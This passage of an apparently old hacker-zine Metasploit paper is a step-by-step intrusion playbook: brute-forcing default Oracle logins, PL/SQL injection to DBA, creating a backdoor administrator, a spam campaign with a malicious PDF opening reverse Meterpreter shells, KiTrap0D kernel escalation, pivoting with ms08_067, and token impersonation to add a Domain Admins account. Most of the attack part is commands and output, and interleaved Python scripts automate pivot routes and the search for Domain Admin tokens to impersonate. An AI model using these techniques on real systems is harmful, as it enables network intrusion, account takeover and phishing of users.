	[End Result]----------------------------------------------------------------------------



	++++++++++++++++++++++++++
	 [0x02b] - Gaining Access
	++++++++++++++++++++++++++

		Now we know the real SID is RD.ORA. Next, use 'admin/oracle/login_brute' to brute-force weak username/password pairs
	such as SYSTEM/MANAGER, DBSNMP/DBSNMP and SCOTT/TIGER, then connect to the Oracle database and run queries with 'admin/oracle/oracle_sql'.
	For example, we use SCOTT/TIGER, a default username/password.

	
	[MSF Result]----------------------------------------------------------------------------

	msf auxiliary(tnscmd) > use admin/oracle/login_brute
	msf auxiliary(login_brute) > show options

	Module options:

	   Name     Current Setting                                                    Required  Description
	   ----     ---------------                                                    --------  -----------
	   CSVFILE  /opt/metasploit3/msf3/data/wordlists/oracle_default_passwords.csv  no        The file that contains a list of default accounts.
	   RHOST                                                                       yes       The Oracle host.
	   RPORT    1521                                                               yes       The TNS port.
	   SID      ORCL                                                               yes       The sid to authenticate with.
	
	msf auxiliary(login_brute) > set RHOST 192.168.163.140
	RHOST => 192.168.163.140
	msf auxiliary(login_brute) > set SID RD.ORA
	SID => RD.ORA
	msf auxiliary(login_brute) > run

	[*] Found user/pass of: DBSNMP/DBSNMP...
	[*] Found user/pass of: SCOTT/TIGER...
	[*] Auxiliary module execution completed

	msf auxiliary(login_brute) > use admin/oracle/oracle_sql
	msf auxiliary(oracle_sql) > show options
	
	Module options:

	   Name    Current Setting          Required  Description
	   ----    ---------------          --------  -----------
	   DBPASS  TIGER                    yes       The password to authenticate with.
	   DBUSER  SCOTT                    yes       The username to authenticate with.
	   RHOST                            yes       The Oracle host.
	   RPORT   1521                     yes       The TNS port.
	   SID     ORCL                     yes       The sid to authenticate with.
	   SQL     select * from v$version  no        The SQL to execute.

	msf auxiliary(oracle_sql) > set RHOST 192.168.163.140
	RHOST => 192.168.163.140
	msf auxiliary(oracle_sql) > set SID RD.ORA
	SID => RD.ORA
	msf auxiliary(oracle_sql) > run
	
	[*] Sending SQL...
	[*] Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production
	[*] PL/SQL Release 9.2.0.1.0 - Production
	[*] CORE 9.2.0.1.0 Production
	[*] TNS for 32-bit Windows: Version 9.2.0.1.0 - Production
	[*] NLSRTL Version 9.2.0.1.0 - Production
	[*] Done...
	[*] Auxiliary module execution completed
	msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"
	SQL => select * from user_role_privs
	msf auxiliary(oracle_sql) > run

	[*] Sending SQL...
	[*] SCOTT,CONNECT,NO,YES,NO
	[*] SCOTT,RESOURCE,NO,YES,NO
	[*] Done...
	[*] Auxiliary module execution completed


	[End Result]----------------------------------------------------------------------------



	+++++++++++++++++++++++++++++++++++++++++++
	 [0x02c] - PL/SQL Injection - Elevate Priv
	+++++++++++++++++++++++++++++++++++++++++++

		
		We can run queries with SCOTT's privileges, but we want more, like god (root). With PL/SQL injection we can potentially elevate from a low-privileged PUBLIC account to an account with
	DBA-level privileges. Metasploit has modules for Oracle SQLi:

	Auxiliary
	=========

	   Name                                        Rank    Description
	   ----                                        ----    -----------
	   sqli/oracle/dbms_cdc_ipublish               normal  SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE
	   sqli/oracle/dbms_cdc_publish                normal  SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE
	   sqli/oracle/dbms_defer_sys                  normal  SQL Injection via SYS.DBMS_DEFER_SYS
	   sqli/oracle/dbms_metadata_get_granted_xml   normal  SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML.
	   sqli/oracle/dbms_metadata_get_xml           normal  SQL Injection via SYS.DBMS_METADATA.GET_XML.
	   sqli/oracle/dbms_metadata_open              normal  SQL Injection via SYS.DBMS_METADATA.OPEN.
	   sqli/oracle/dbms_export_extension           normal  SQL Injection via DBMS_EXPORT_EXTENSION
	   sqli/oracle/lt_compressworkspace            normal  SQL Injection via SYS.LT.COMPRESSWORKSPACE.
	   sqli/oracle/lt_findricset_cursor            normal  SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method
	   sqli/oracle/lt_mergeworkspace               normal  SQL Injection via SYS.LT.MERGEWORKSPACE.
	   sqli/oracle/lt_removeworkspace              normal  SQL Injection via SYS.LT.REMOVEWORKSPACE.
	   sqli/oracle/lt_rollbackworkspace            normal  SQL Injection via SYS.LT.ROLLBACKWORKSPACE.

		 
		It's time to elevate SCOTT's privileges to DBA with the DBMS_EXPORT_EXTENSION SQLi:
	
	[MSF Result]----------------------------------------------------------------------------

	msf > use sqli/oracle/dbms_export_extension
	msf auxiliary(dbms_export_extension) > set RHOST 192.168.163.140
	RHOST => 192.168.163.140
	msf auxiliary(dbms_export_extension) > set SID RD.ORA
	SID => RD.ORA
	msf auxiliary(dbms_export_extension) > run

	[*] Sending package...
	[*] Done...
	[*] Sending body...
	[*] Done...
	[*] Sending declare...
	[*] Done...
	[*] Auxiliary module execution completed

	msf auxiliary(dbms_export_extension) > use admin/oracle/oracle_sql
	msf auxiliary(oracle_sql) > set RHOST 192.168.163.140
	RHOST => 192.168.163.140
	msf auxiliary(oracle_sql) > set SID RD.ORA
	SID => RD.ORA
	msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"
	SQL => select * from user_role_privs
	msf auxiliary(oracle_sql) > run

	[*] Sending SQL...
	[*] SCOTT,CONNECT,NO,YES,NO
	[*] SCOTT,DBA,NO,YES,NO
	[*] SCOTT,RESOURCE,NO,YES,NO
	[*] Done...
	[*] Auxiliary module execution completed

	[End Result]----------------------------------------------------------------------------
	
		W00T W00T !!, SCOTT now has DBA. Happy time to spawn a shell with Java. The post-exploitation module works through a Java stored procedure, so first we must grant JAVASYSPRIV to SCOTT (DBA lets us grant it to ourselves):

	[MSF Result]----------------------------------------------------------------------------

	msf auxiliary(oracle_sql) > set SQL "grant javasyspriv to SCOTT"
	SQL => grant javasyspriv to SCOTT
	msf auxiliary(oracle_sql) > run
	
	[*] Sending SQL...
	[*] Done...
	[*] Auxiliary module execution completed
	
	msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"
	SQL => select * from user_role_privs
	msf auxiliary(oracle_sql) > run

	[*] Sending SQL...
	[*] SCOTT,CONNECT,NO,YES,NO
	[*] SCOTT,DBA,NO,YES,NO
	[*] SCOTT,JAVASYSPRIV,NO,YES,NO
	[*] SCOTT,RESOURCE,NO,YES,NO
	[*] Done...
	[*] Auxiliary module execution completed

	[End Result]----------------------------------------------------------------------------
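As an added example (my code, not part of the original paper or of Metasploit), here is a Python script that parses the rows admin/oracle/oracle_sql prints for `select * from user_role_privs` and diffs two snapshots, so the check that confirmed the escalation above can also be run as detection logic over saved module output. The snapshots marked as copied are taken from this paper's transcript; the baseline with only CONNECT and RESOURCE is assumed (SCOTT's stock roles, which the paper never prints), and the audit query is my own, built from the SYS packages the modules listed above abuse:

```python
# Added example, not code from the original paper or from Metasploit.
# Parses 'admin/oracle/oracle_sql' output for: select * from user_role_privs
# (columns USERNAME, GRANTED_ROLE, ADMIN_OPTION, DEFAULT_ROLE, OS_GRANTED)
# and diffs two snapshots to flag a PUBLIC-level account gaining DBA.

# Roles whose sudden appearance on an ordinary account is an escalation.
HIGH_RISK_ROLES = {"DBA", "JAVASYSPRIV", "IMP_FULL_DATABASE", "EXP_FULL_DATABASE"}

# SYS packages abused by the sqli/oracle/* modules listed in this paper.
SQLI_PACKAGES = (
    "DBMS_CDC_IPUBLISH", "DBMS_CDC_PUBLISH", "DBMS_DEFER_SYS",
    "DBMS_METADATA", "DBMS_EXPORT_EXTENSION", "LT",
)

# Assumed baseline (SCOTT's stock roles); the paper does not print it.
BASELINE = [
    "[*] Sending SQL...",
    "[*] SCOTT,CONNECT,NO,YES,NO",
    "[*] SCOTT,RESOURCE,NO,YES,NO",
    "[*] Done...",
]
# Copied from the transcript after the dbms_export_extension run.
AFTER_SQLI = [
    "[*] Sending SQL...",
    "[*] SCOTT,CONNECT,NO,YES,NO",
    "[*] SCOTT,DBA,NO,YES,NO",
    "[*] SCOTT,RESOURCE,NO,YES,NO",
    "[*] Done...",
]
# Copied from the transcript after 'grant javasyspriv to SCOTT'.
AFTER_JAVA = AFTER_SQLI[:3] + ["[*] SCOTT,JAVASYSPRIV,NO,YES,NO"] + AFTER_SQLI[3:]


def parse_role_rows(output_lines):
    """Return the set of (USERNAME, GRANTED_ROLE) pairs in module output.

    Status lines ('Sending SQL...', 'Done...') carry no commas; result rows
    are printed as comma-joined column values after the '[*] ' prefix.
    """
    rows = set()
    for line in output_lines:
        body = line.strip()
        if not body.startswith("[*]"):
            continue
        body = body[3:].strip()
        if "," not in body:
            continue
        fields = [f.strip().upper() for f in body.split(",")]
        if len(fields) >= 2:
            rows.add((fields[0], fields[1]))
    return rows


def escalation_report(before_lines, after_lines):
    """List roles gained between two snapshots as (user, role, high_risk)."""
    gained = parse_role_rows(after_lines) - parse_role_rows(before_lines)
    return sorted((u, r, r in HIGH_RISK_ROLES) for u, r in gained)


def audit_query(grantee="PUBLIC"):
    """SQL a DBA can run to see which of the abused packages 'grantee' may
    execute. Patching is the fix; revoking these EXECUTE grants from PUBLIC
    shrinks the injection surface in the meantime."""
    names = ", ".join(f"'{p}'" for p in SQLI_PACKAGES)
    return (
        "SELECT grantee, table_name, privilege FROM dba_tab_privs "
        "WHERE owner = 'SYS' AND privilege = 'EXECUTE' "
        f"AND grantee = '{grantee.upper()}' AND table_name IN ({names})"
    )


if __name__ == "__main__":
    for user, role, risky in escalation_report(BASELINE, AFTER_SQLI):
        print(f"{user} gained {role}{'  <-- escalation' if risky else ''}")
    print(audit_query())
```

Feed it the saved output of two oracle_sql runs and any new DBA or JAVASYSPRIV grant on an ordinary schema shows up as an escalation; the generated audit query is the one to run as a DBA before an attacker does.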

		Use admin/oracle/post_exploitation/win32exec to execute OS commands on the database server. The command runs with the privileges of the Oracle service (LocalSystem on a default Windows install of that era), so here it adds a local user and puts it in Administrators for the next step:

	[MSF Result]----------------------------------------------------------------------------

	msf > use admin/oracle/post_exploitation/win32exec
	msf auxiliary(win32exec) > set CMD "net user zeq3ul 5plus4=10 /add && net localgroup administrators zeq3ul /add"
	CMD => net user zeq3ul 5plus4=10 /add && net localgroup administrators zeq3ul /add
	msf auxiliary(win32exec) > set SID RD.ORA
	SID => RD.ORA
	msf auxiliary(win32exec) > set RHOST 192.168.163.140
	RHOST => 192.168.163.140
	msf auxiliary(win32exec) > run
	
	[*] Creating MSF JAVA class...
	[*] Done...
	[*] Creating MSF procedure...
	[*] Done...
	[*] Sending command: 'net user zeq3ul 5plus4=10 /add && net localgroup administrators zeq3ul /add'
	[*] Done...
	[*] Auxiliary module execution completed
	
	[End Result]----------------------------------------------------------------------------

		Next, fully compromise the system: authenticate with the new local administrator over SMB using windows/smb/psexec and a Meterpreter payload:

	[MSF Result]----------------------------------------------------------------------------

	msf > use windows/smb/psexec
	msf exploit(psexec) > set RHOST 192.168.163.140
	RHOST => 192.168.163.140
	msf exploit(psexec) > set SMBUser zeq3ul
	SMBUser => zeq3ul
	msf exploit(psexec) > set SMBPass 5plus4=10
	SMBPass => 5plus4=10
	msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
	PAYLOAD => windows/meterpreter/reverse_tcp
	msf exploit(psexec) > set LHOST 192.168.163.137
	LHOST => 192.168.163.137
	msf exploit(psexec) > exploit
	
	[*] Connecting to the server...
	[*] Started reverse handler on port 4444
	[*] Authenticating as user 'zeq3ul'...
	[*] Uploading payload...
	[*] Created \mFfFcDAj.exe...
	[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.163.140[\svcctl] ...
	[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.163.140[\svcctl] ...
	[*] Obtaining a service manager handle...
	[*] Creating a new service (mPJJxvtC - "MHMAPTlybviISxdBueIVtLYOTcL")...
	[*] Closing service handle...
	[*] Opening service...
	[*] Starting the service...
	[*] Removing the service...
	[*] Closing service handle...
	[*] Deleting \mFfFcDAj.exe...
	[*] Sending stage (723456 bytes)
	[*] Meterpreter session 1 opened (192.168.163.137:4444 -> 192.168.163.140:1633)
	
	meterpreter > getuid
	Server username: NT AUTHORITY\SYSTEM
	
	[End Result]----------------------------------------------------------------------------
	
	

###############################	
 [0x03] - Operation CloudBurst
###############################
	
		Metasploit is a tool for exploiting system and software vulnerabilities. New software vulnerabilities arrive every day: "Operation Aurora" hit Internet Explorer (I hope to see an IE8 exploit that bypasses DEP+ASLR soon ;) ), plus Adobe Reader/Flash, Microsoft Office (evil macros), Java applets, cross-site scripting, etc.
		
		The new trend is attacking Layer 8, the user, with client-side exploits. This chapter walks "From Slave to God": start with a client-side exploit to get a foothold inside the victim's intranet, then attack the internal systems with the techniques from "The Art of Grey-Box Attack". Before the operation begins, we must prepare one more technique for the battle.

		
		<< KiTrap0D >> Exploit for all Windows versions: a local ring0 kernel exploit by Tavis Ormandy (taviso), disclosed in January 2010.
		
		All 32bit x86 versions of Windows NT released since 27-Jul-1993 are believed to
		be affected, including but not limited to the following actively supported
		versions:

			- Windows 2000
			- Windows XP
			- Windows Server 2003
			- Windows Vista
			- Windows Server 2008
			- Windows 7
			- etc.
		
		KiTrap0D has been integrated into the Metasploit Framework as a Meterpreter script (run kitrap0d), so SVN-update Metasploit to the latest revision to get it. Note the "32bit" condition: the bug is in the NTVDM subsystem, which 64-bit Windows does not have.
		
		
		In this operation we send a batch of spam mails to the victim and wait for a connection back. The lure is a PDF that exploits the Adobe JBIG2Decode vulnerability in Adobe Reader 8/9, chosen because most people do not update Reader. Once one domain-joined machine is compromised and escalated to NT AUTHORITY\SYSTEM locally, we want more !!!. This step shows how to impersonate a Domain Admins token on that machine and fully compromise the domain controller and every Windows system joined to the domain.
	
	
	:MISSION:

			     SPAM Mails
	1.	Zeq3ul ---------------------> Victim@abc.com (opens the PDF; reverse shell connects back to Zeq3ul)
	 	  ^				   |
	  	  |				   |
	    	  \--------------------------------/
	              Reverse Meterpreter Shell			

	2.	Zeq3ul gets a Meterpreter shell with the user's privileges, then exploits the local kernel with KiTrap0D to reach SYSTEM.
	3.	Zeq3ul can now fully compromise the victim's system, then pivots through it to attack other machines joined to the domain.
	4.	Compromise the domain controller and every system. Victory !!!



	[MSF Result]---------------------------------------------------------------------------------
	
	bt framework3 # msfconsole
	                 ____________
	                < metasploit >
	                 ------------
	                        \   ,__,
	                         \  (oo)____
	                            (__)    )\
	                               ||--|| *


	       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
	+ -- --=[ 490 exploits - 226 auxiliary
	+ -- --=[ 192 payloads - 23 encoders - 8 nops
	       =[ svn r8091 updated 39 days ago (2010.01.09)

	Warning: This copy of the Metasploit Framework was last updated 39 days ago.
	         We recommend that you update the framework at least every other day.
	         For information on updating your copy of Metasploit, please see:
	             http://www.metasploit.com/redmine/projects/framework/wiki/Updating
                                      	
	msf > use windows/fileformat/adobe_jbig2decode
	msf exploit(adobe_jbig2decode) > set TARGET 0
	TARGET => 0
	msf exploit(adobe_jbig2decode) > set FILENAME malfile.pdf
	FILENAME => malfile.pdf
	msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp
	PAYLOAD => windows/meterpreter/reverse_tcp
	msf exploit(adobe_jbig2decode) > set LHOST 192.168.80.131
	LHOST => 192.168.80.131
	msf exploit(adobe_jbig2decode) > exploit

	[*] Handler binding to LHOST 0.0.0.0
	[*] Started reverse handler
	[*] Creating 'malfile.pdf' file...
	[*] Generated output file /pentest/exploits/framework3/data/exploits/malfile.pdf
	[*] Exploit completed, but no session was created.
	msf exploit(adobe_jbig2decode) > back

	msf > use exploit/multi/handler
	msf exploit(handler) > set LHOST 192.168.163.137
	LHOST => 192.168.163.137
	msf exploit(handler) > set LPORT 4444
	LPORT => 4444
	msf exploit(handler) > exploit -j
	[*] Exploit running as background job.
	msf exploit(handler) >
	[*] Starting the payload handler...
	[*] Started reverse handler on port 4444
	[*] Sending stage (723456 bytes)
	[*] Meterpreter session 1 opened (192.168.163.137:4444 -> 192.168.163.133:1156)
	msf exploit(handler) > sessions -l
	
	Active sessions
	===============
	
  	Id  Description  Tunnel
  	--  -----------  ------
 	 1   Meterpreter  192.168.163.137:4444 -> 192.168.163.133:1156

	msf exploit(handler) > sessions -i 1
	[*] Starting interaction with 1...
	
	meterpreter > getuid
	Server username: WINXP\cwh

	meterpreter > use priv
	Loading extension priv...success.

	meterpreter > run kitrap0d
	[*] Currently running as WINXP\cwh

	[*] Loading the vdmallowed executable and DLL from the local system...
	[*] Uploading vdmallowed to C:\DOCUME~1\cwh\LOCALS~1\Temp\kaZZPD.exe...
	[*] Uploading vdmallowed to C:\DOCUME~1\cwh\LOCALS~1\Temp\vdmexploit.dll...
	[*] Escalating our process (PID:3248)...

	--------------------------------------------------
	Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
	-------------------------------------------- taviso@sdf.lonestar.org ---


	[?] GetVersionEx() => 5.1
	[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
	[?] Searching for kernel 5.1 signature: version 2...
	[+] Trying signature with index 3
	[+] Signature found 0x288de bytes from kernel base
	[+] Starting the NTVDM subsystem by launching MS-DOS executable
	[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 1204
	[?] OpenProcess(1204) => 0x7e8
	[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
	[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
	[?] WaitForSingleObject(0x7d4, INFINITE);
	[?] GetExitCodeThread(0x7d4, 0012FF44); => 0x77303074
	[+] The exploit thread reports exploitation was successful
	[+] w00t! You can now use the shell opened earlier

	[*] Deleting files...
	[*] Now running as NT AUTHORITY\SYSTEM
	
	meterpreter > getuid
	Server username: NT AUTHORITY\SYSTEM


	meterpreter > route
	
	Network routes
	==============
	
	Subnet           Netmask          Gateway
	------           -------          -------
	0.0.0.0          0.0.0.0          192.211.163.2
	127.0.0.0        255.0.0.0        127.0.0.1
	192.211.163.0    255.255.255.0    192.211.163.133
	192.211.163.133  255.255.255.255  127.0.0.1
	192.211.163.255  255.255.255.255  192.211.163.133
	224.0.0.0        240.0.0.0        192.211.163.133
	255.255.255.255  255.255.255.255  192.211.163.133
	
	meterpreter >
	Background session 1? [y/N]y
	
	msf exploit(handler) > route add 192.211.163.0 255.255.255.0 1
	msf exploit(handler) > route print
	
	Active Routing Table
	====================

	  Subnet           Netmask          Gateway
	  ------           -------          -------
	  192.211.163.0    255.255.255.0    Session 1
	
	msf exploit(handler) > use windows/smb/ms08_067_netapi
	msf exploit(ms08_067_netapi) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp
	PAYLOAD => windows/patchupmeterpreter/reverse_tcp
	msf exploit(ms08_067_netapi) > show options
	
	Module options:
	
	   Name     Current Setting  Required  Description                            
	   ----     ---------------  --------  -----------                            
	   RHOST                     yes       The target address                     
	   RPORT    445              yes       Set the SMB service port               
	   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) 
	
	Payload options (windows/patchupmeterpreter/reverse_tcp):
	
	   Name      Current Setting  Required  Description                          
	   ----      ---------------  --------  -----------                          
	   EXITFUNC  thread           yes       Exit technique: seh, thread, process 
	   LHOST                      yes       The local address                    
	   LPORT     4444             yes       The local port                       

	Exploit target:

	   Id  Name                
	   --  ----                
	   0   Automatic Targeting 
	
	msf exploit(ms08_067_netapi) > set RHOST 192.211.163.140
	RHOST => 192.211.163.140
	msf exploit(ms08_067_netapi) > set LPORT 5000
	LPORT => 5000
	msf exploit(ms08_067_netapi) > set LHOST 192.168.163.137
	LHOST => 192.168.163.137
	msf exploit(ms08_067_netapi) > exploit

	[*] Handler binding to LHOST 0.0.0.0
	[*] Started reverse handler
	[*] Automatically detecting the target...
	[*] Fingerprint: Windows XP Service Pack 2 - lang:English
	[*] Selected Target: Windows XP SP2 English (NX)
	[*] Triggering the vulnerability...
	[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
	[*] Sending stage (2650 bytes)
	[*] Sleeping before handling stage...
	[*] Uploading DLL (205835 bytes)...
	[*] Upload completed.
	[*] Meterpreter session 2 opened (192.168.163.137:5000 -> 192.168.163.133:1233)

	meterpreter >
	Background session 2? [y/N]y
	
	msf exploit(ms08_067_netapi) > sessions -l

	Active sessions
	===============
	
	  Id  Description  Tunnel                                
	  --  -----------  ------                                
	  1   Meterpreter  192.168.163.137:4444 -> 192.168.163.133:1156 
	  2   Meterpreter  192.168.163.137:5000 -> 192.168.163.133:1233  

	//We used the pivot technique: the MSF route sends exploit traffic for 192.211.163.0/24 through session 1, so we compromised a host inside a network that is not routable from the attacker's box.
	//Note that the tunnel shows 192.168.163.137 connected to 192.168.163.133: we used a reverse payload, and 192.168.163.133 is the external (NAT) address. 192.211.163.133 and 192.211.163.140 sit behind that NAT router.
	//Caveat: the MSF route only carries the exploit through the pivot. The reverse_tcp stager connects back from the target on its own, so this works only because the NATed host can reach LHOST; if it cannot, use a bind payload, whose connection the route does carry through the session.
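	As an added example (my code, not from the paper or from Metasploit), here is a Python script that automates the two decisions made above: which subnets from the compromised host's Meterpreter route table are worth a route add, and which session a later target will be sent through. The route table is copied from the transcript; the most-specific-match rule in session_for mirrors how the framework's switchboard picks a route, but the function is my simplification, not the framework's own code:

```python
# Added example, not code from the original paper or from Metasploit.
# Derives pivot routes from a compromised host's Meterpreter 'route' output
# and resolves which session a target address will be tunnelled through.
import ipaddress

# Copied from the transcript: 'route' on the first compromised host (session 1).
METERPRETER_ROUTE_OUTPUT = """\
Subnet           Netmask          Gateway
------           -------          -------
0.0.0.0          0.0.0.0          192.211.163.2
127.0.0.0        255.0.0.0        127.0.0.1
192.211.163.0    255.255.255.0    192.211.163.133
192.211.163.133  255.255.255.255  127.0.0.1
192.211.163.255  255.255.255.255  192.211.163.133
224.0.0.0        240.0.0.0        192.211.163.133
255.255.255.255  255.255.255.255  192.211.163.133
"""


def parse_routes(text):
    """Return [(network, gateway)] from the Windows-style route table."""
    routes = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        try:
            net = ipaddress.ip_network(f"{parts[0]}/{parts[1]}", strict=False)
            gw = ipaddress.ip_address(parts[2])
        except ValueError:
            continue  # header and separator lines
        routes.append((net, gw))
    return routes


def pivot_subnets(text):
    """Networks worth pivoting into: drop the default route, loopback,
    host (/32) routes, multicast and the limited-broadcast entry."""
    keep = []
    for net, _gw in parse_routes(text):
        if net.prefixlen in (0, 32) or net.is_loopback or net.is_multicast:
            continue
        keep.append(net)
    return keep


def route_add_commands(text, session_id):
    """msfconsole commands that send traffic for each subnet via the session."""
    return [f"route add {n.network_address} {n.netmask} {session_id}"
            for n in pivot_subnets(text)]


def session_for(target, msf_routes):
    """msf_routes: [(cidr, session_id)] as shown by 'route print'.
    Most specific match wins, as the framework's switchboard does;
    None means the attacker's box reaches the target directly."""
    ip = ipaddress.ip_address(target)
    best = None
    for cidr, sid in msf_routes:
        net = ipaddress.ip_network(cidr)
        if ip in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, sid)
    return best[1] if best else None


if __name__ == "__main__":
    for cmd in route_add_commands(METERPRETER_ROUTE_OUTPUT, 1):
        print(cmd)
    table = [("192.211.163.0/24", 1)]
    print("192.211.163.140 ->", session_for("192.211.163.140", table))
    print("192.168.163.140 ->", session_for("192.168.163.140", table))
```

	Paste the host's route output in and the script prints exactly the `route add 192.211.163.0 255.255.255.0 1` typed above; a target outside every added subnet resolves to None, meaning no pivot and a direct connection from the attacker's box.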
		
	//Let's Compromise Domain Controller.
	
	msf exploit(ms08_067_netapi) > sessions -i 2
	[*] Starting interaction with 2...	

	meterpreter > shell
	Process 15484 created.
	Channel 1 created.
	Microsoft Windows XP [Version 5.1.2600]
	(C) Copyright 1985-2001 Microsoft Corp.
	
	C:\WINDOWS\system32>net user
	net user
	
	User accounts for \\
	
	-------------------------------------------------------------------------------
	abcxyz                   admin                  Administrator
	ASPNET                   csadmin                Guest
	IUSR_HDB1                IWAM_HDB1              SUPPORT_388945a0
	The command completed with one or more errors.

	
	C:\WINDOWS\system32>net group "domain admins" /domain
	net group "domain admins" /domain
	The request will be processed at a domain controller for domain clqa.loc.

	Group name     Domain Admins
	Comment        Designated administrators of the domain
	
	Members

	-------------------------------------------------------------------------------
	Adit.Pr                  Administrator            Chal.Ar
	Chal.Are           	 john.sm                  Kai.om
	kitti.admin              pom.sri                  
	The command completed successfully.

	
	C:\WINDOWS\system32>exit

	
	meterpreter > use incognito
	Loading extension incognito...success.
	meterpreter > list_tokens -u

	Delegation Tokens Available
	========================================
	CLQA\CLESB.Service
	CLQA\RS.service
	NT AUTHORITY\LOCAL SERVICE
	NT AUTHORITY\NETWORK SERVICE
	NT AUTHORITY\SYSTEM
	
	Impersonation Tokens Available
	========================================
	CLQA\pom.sri
	CLQA\john.sm
	NT AUTHORITY\ANONYMOUS LOGON
	
	meterpreter > impersonate_token CLQA\\pom.sri
	[-] No delegation token available
	[+] Successfully impersonated user CLQA\pom.sri
	meterpreter > getuid
	Server username: CLQA\pom.sri
	meterpreter > execute -i -f cmd.exe -t
	Process 14992 created.
	Channel 2 created.
	Microsoft Windows [Version 5.2.3790]
	(C) Copyright 1985-2003 Microsoft Corp.
	
	C:\WINDOWS\system32>whoami
	whoami
	clqa\pom.sri
	
	
	C:\WINDOWS\system32>net user zeq3ul 5plus4=10 /add /domain
	net user zeq3ul 5plus4=10 /add /domain
	The request will be processed at a domain controller for domain clqa.loc.
	
	The command completed successfully.


	C:\WINDOWS\system32>net group "domain admins" zeq3ul /add /domain
	net group "domain admins" zeq3ul /add /domain
	The request will be processed at a domain controller for domain clqa.loc.

	The command completed successfully.
	
	
	C:\WINDOWS\system32>net group "domain admins" /domain
	net group "domain admins" /domain
	The request will be processed at a domain controller for domain clqa.loc.
	
	Group name     Domain Admins
	Comment        Designated administrators of the domain
	
	Members
	
	-------------------------------------------------------------------------------
	Adit.Pr                  Administrator            Chal.Ar
	Chal.Are           	 john.sm                  Kai.om
	kitti.admin              pom.sri                  zeq3ul
	The command completed successfully.
	
	C:\WINDOWS\system32>exit
		
		
	[End Result]------------------------------------------------------------------------------------

		From the result we can conclude: compromising just one machine joined to the domain is enough, provided a Domain Admins token is present on it (here pom.sri, whose token list_tokens showed on that host). 
	Impersonate that token, add a user and put our user (zeq3ul) in the "Domain admins" group. Now every system joined to the domain controller is ours. Mission Accomplished !!!!
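		As an added example (my code, not part of the paper or of incognito), here is a Python script that does the cross-check made by eye above: it parses the member list printed by net group "domain admins" /domain and the output of incognito's list_tokens -u, and reports which tokens on the host belong to Domain Admins, delegation tokens first because incognito separates those as the ones also usable for network authentication. Both sample outputs are copied from the transcript; the assumption that account names contain no spaces is mine.

```python
# Added example, not code from the original paper or from incognito.
# Cross-checks 'net group "domain admins" /domain' against incognito's
# 'list_tokens -u' to find Domain Admins tokens present on the host.

# Both samples are copied from the transcript in this paper.
NET_GROUP_OUTPUT = """\
The request will be processed at a domain controller for domain clqa.loc.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Adit.Pr                  Administrator            Chal.Ar
Chal.Are                 john.sm                  Kai.om
kitti.admin              pom.sri
The command completed successfully.
"""

LIST_TOKENS_OUTPUT = """\
Delegation Tokens Available
========================================
CLQA\\CLESB.Service
CLQA\\RS.service
NT AUTHORITY\\LOCAL SERVICE
NT AUTHORITY\\NETWORK SERVICE
NT AUTHORITY\\SYSTEM

Impersonation Tokens Available
========================================
CLQA\\pom.sri
CLQA\\john.sm
NT AUTHORITY\\ANONYMOUS LOGON
"""


def parse_net_group(text):
    """Member names printed by 'net group', lower-cased.

    Members follow the dashed line in fixed-width columns; this assumes
    account names contain no spaces (true for the names above)."""
    members = set()
    in_members = False
    for line in text.splitlines():
        if line.startswith("----"):
            in_members = True
            continue
        if not in_members:
            continue
        if line.startswith("The command completed"):
            break
        members.update(name.lower() for name in line.split())
    return members


def parse_list_tokens(text):
    """{'delegation': [...], 'impersonation': [...]} from list_tokens -u."""
    tokens = {"delegation": [], "impersonation": []}
    section = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("Delegation Tokens"):
            section = "delegation"
        elif line.startswith("Impersonation Tokens"):
            section = "impersonation"
        elif line and not line.startswith("===") and section is not None:
            tokens[section].append(line)
    return tokens


def domain_admin_tokens(net_group_text, list_tokens_text, domain):
    """(token, kind) for every token whose DOMAIN\\user is a Domain Admin.
    Delegation tokens are listed first: incognito separates them because
    they can also be used for network authentication."""
    admins = parse_net_group(net_group_text)
    hits = []
    for kind, names in parse_list_tokens(list_tokens_text).items():
        for full in names:
            dom, sep, user = full.partition("\\")
            if sep and dom.lower() == domain.lower() and user.lower() in admins:
                hits.append((full, kind))
    hits.sort(key=lambda h: (h[1] != "delegation", h[0].lower()))
    return hits


if __name__ == "__main__":
    for token, kind in domain_admin_tokens(NET_GROUP_OUTPUT, LIST_TOKENS_OUTPUT, "CLQA"):
        # Meterpreter wants the backslash doubled, as in the transcript.
        print(f"impersonate_token {token.replace(chr(92), chr(92) * 2)}  ({kind})")
```

		On the transcript's data it reports CLQA\john.sm and CLQA\pom.sri as Domain Admins with impersonation tokens and no delegation token for either, which is exactly what incognito printed before the impersonation succeeded.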



#####################
 [0x04] - References
#####################

[1] Zero Cold@intern0t.net
[2] http://carnal0wnage.attackresearch.com
[3] http://blog.metasploit.com/
[4] Metasploit Unleashed
[5] Full Scope Security Attacking Layer 8


####################
 [0x05] - Greetz To
####################
	
